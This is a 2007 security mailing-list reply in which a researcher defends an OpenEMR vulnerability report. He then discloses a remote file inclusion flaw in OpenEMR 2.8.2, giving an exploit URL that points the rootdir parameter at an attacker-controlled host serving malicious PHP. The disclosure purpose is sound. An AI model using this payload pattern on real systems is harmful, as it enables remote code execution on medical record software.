Dnia 29-01-2007, pon o godzinie 14:11 +0100, bzhbfzj3001@xxxxxxxxxxxxxx napisał(a): [...] > Unfortunately your advisory is once again, fake. The variable you are > referring to is set in interface/globals.php which is of course included > before the mentioned include statement. > Hmm, it isn't fake - i was able to exploit this bug. This software (i mean openemr) i so badly written that i have been able to find few other bugs, like: """ Possible RCE in OpenEMR 2.8.2 Exploit: http://example.com/openemr/interface/login/login_frame.php?rootdir=http://hack.me/ Place login/filler.php in your root of http://hack.me/ server directory with some 3vil PHP code. Risk: Critical Precautions: - allow_url_fopen needs to be turned on """ I belive it is possible to find many similar, but m train trip was rather short. However, this software is so badly written, that finding such bugs is extremely low hanging fruit. > Tinus -- Michael "carstein" Melewski | "We have no future bacause our present carstein()7thguard.net | is too volatile. We have only risk mobile: 512 357 303 | management. The spinning of the given JID: carstein()gentoo.pl | moment's scenarios. Pattern recognition.
